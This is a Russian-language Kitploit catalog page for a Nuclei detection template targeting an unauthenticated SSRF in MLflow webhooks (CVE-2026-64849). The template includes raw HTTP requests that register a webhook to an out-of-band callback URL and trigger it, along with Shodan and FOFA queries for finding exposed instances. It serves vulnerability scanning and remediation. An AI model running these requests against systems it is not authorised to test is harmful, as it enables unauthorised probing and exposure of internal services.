Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-64849.yaml — Обнаруживает неаутентифицированный SSRF через вебхуки MLflow (CVE-2026-64849), который получает доступ к внутренним или облачным сервисам метаданных и раскрывает детали ответа с помощью обхода редиректов. | Kitploit
Инструменты/GitHubGitHub/zavisco/cve-2026-64849.yaml
Сканеры уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование безопасности APIСбор информацииБезопасность облачных сред
GitHubzavisco/cve-2026-64849.yaml

CVE-2026-64849.yaml

Обнаруживает неаутентифицированный SSRF через вебхуки MLflow (CVE-2026-64849), который получает доступ к внутренним или облачным сервисам метаданных и раскрывает детали ответа с помощью обхода редиректов.

Репозиторий
0 дней назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

id: CVE-2026-64849

info: name: SSRF в webhook MLflow — неаутентифицированное полное чтение через обход редиректа author: DhiyaneshDk severity: critical description: | MLflow > 3.15.0 содержит уязвимость раскрытия информации, вызванную некорректной проверкой URL-адресов webhook, что позволяет злоумышленникам обращаться к внутренним сервисам или облачным сервисам метаданных и получать детали ответа; для эксплуатации требуется неаутентифицированный доступ к тестовой конечной точке webhook. impact: | Злоумышленники могут обращаться к внутренним сервисам или облачным сервисам метаданных и получать статус и тело ответа, что потенциально раскрывает конфиденциальную информацию. remediation: | Обновите MLflow до версии, содержащей PR #24258, который добавляет SSRFProtectedHTTPAdapter для проверки IP-адресов во время подключения, охватывающей цели редиректов и DNS-rebinding. reference: - https://github.com/mlflow/mlflow/security/advisories/GHSA-7gwp-5pfp-969j - https://github.com/mlflow/mlflow/pull/24258 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N cvss-score: 9.3 cve-id: CVE-2026-64849 epss-score: 0.00349 epss-percentile: 0.27929 cwe-id: CWE-918 metadata: max-request: 3 verified: true shodan-query: http.title:"MLflow" fofa-query: title="MLflow" tags: cve,cve2026,mlflow,ssrf,oast,webhook,oss,vkev

variables: random: "{{rand_text_alpha(8)}}"

http:

  • raw:

    • | POST /api/2.0/mlflow/webhooks HTTP/1.1 Host: {{Hostname}} Content-Type: application/json

      {"name":"{{random}}","url":"https://{{interactsh-url}}","events":[{"entity":"REGISTERED_MODEL","action":"CREATED"}]}

    • | POST /api/2.0/mlflow/webhooks/{{webhook_id}}/test HTTP/1.1 Host: {{Hostname}} Content-Type: application/json

      {"webhook_id":"{{webhook_id}}","event":{"entity":"REGISTERED_MODEL","action":"CREATED"}}

    • | DELETE /api/2.0/mlflow/webhooks/{{webhook_id}} HTTP/1.1 Host: {{Hostname}}

    matchers-condition: and matchers:

    • type: word part: body_1 words:

      • "webhook_id"
      • "ACTIVE" condition: and
    • type: word part: interactsh_protocol words:

      • "http"

    extractors:

    • type: regex name: webhook_id part: body internal: true regex:
      • '"webhook_id":\s*"([^"]+)"' group: 1

digest: 490a0046304402202e79c8a66a1a62e91bddc38dcebe402ecee4ff7036a36448e522f5bd64c13a8702203f2da52bd9424be56645e2866f623392ae4455c8d8c68549ab3d368fb7ff91c2:922c64590222798bb761d5b6d8e72950

Скачать инструмент